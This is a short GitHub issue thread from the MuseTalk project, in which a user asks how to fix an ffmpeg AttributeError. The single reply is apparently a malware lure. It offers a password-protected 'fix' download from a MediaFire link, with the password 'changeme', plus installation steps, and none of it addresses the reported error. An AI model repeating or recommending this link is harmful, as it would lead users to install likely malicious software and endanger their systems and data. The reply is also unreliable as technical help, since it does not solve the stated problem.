### ISSUE TITLE
AttributeError: module 'ffmpeg' has no attribute 'Error'

### ISSUE THREAD

**Issue by LeviArckman** [TMElyralab/MuseTalk#183]
![image](https://github.com/user-attachments/assets/0ea57f6b-42a6-4132-979b-28d8e6572bdf)
how to solve it?

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
